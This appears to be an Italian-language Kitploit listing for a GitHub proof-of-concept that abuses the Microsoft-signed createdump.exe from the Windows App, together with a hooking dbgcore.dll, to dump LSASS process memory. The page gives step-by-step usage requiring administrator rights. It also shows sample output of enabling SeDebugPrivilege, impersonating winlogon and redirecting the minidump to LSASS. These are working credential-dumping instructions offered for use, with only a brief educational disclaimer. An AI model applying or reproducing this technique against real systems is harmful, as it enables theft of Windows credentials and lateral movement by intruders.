Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
createdump — Leverage WindowsApp createdump tool to obtain an lsass dump | Kitploit
Strumenti/GitHubGitHub/rweijnen/createdump
Password AttacksImpersonation ToolsPost-ExploitationRed Teaming
GitHubrweijnen/createdump

createdump

Leverage WindowsApp createdump tool to obtain an lsass dump

Vedi Repository
151201 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Windows App Windows App LSASS Dump - Prova di concetto

Questo progetto dimostra come eseguire il dump del processo LSASS utilizzando lo strumento createdump.exe, un eseguibile firmato Microsoft, dall'app Windows, sfruttando un hook personalizzato per consentire l'accesso al processo LSASS.

root@kitploit:~
Get-AuthentiCodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnc\createdump.exe')

    Directory: C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc

SignerCertificate                         Status                                       StatusMessage                               Path
-----------------                         ------                                       -------------                               ----
C2048FB509F1C37A8C3E9EC6648118458AA01780  Valid                                        Signature verified.                         createdump.exe

Come Usare

  1. Copiare createdump dalla cartella WindowsApp in una cartella a scelta (copy C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc\createdump.exe .)
  2. posizionare dbgcore.dll di questo repository nella stessa cartella
  3. eseguire createdump (opzionalmente fornire parametri)

nota: richiede diritti di amministratore.

L'output dovrebbe essere qualcosa del genere:

root@kitploit:~
c:\work\_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump

Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:\Users\me\AppData\Local\Temp\dump.35828.dmp
MiniDumpWriteDump called with:
  ProcessId: 35828
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:\Windows\System32\DbgCore.dll
Calling original with:
  ProcessId: 1512
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.

Disclaimer

Questo progetto è inteso esclusivamente a scopo educativo. L'uso improprio di questo strumento potrebbe violare le politiche sulla privacy e sulla sicurezza.

Scarica lo strumento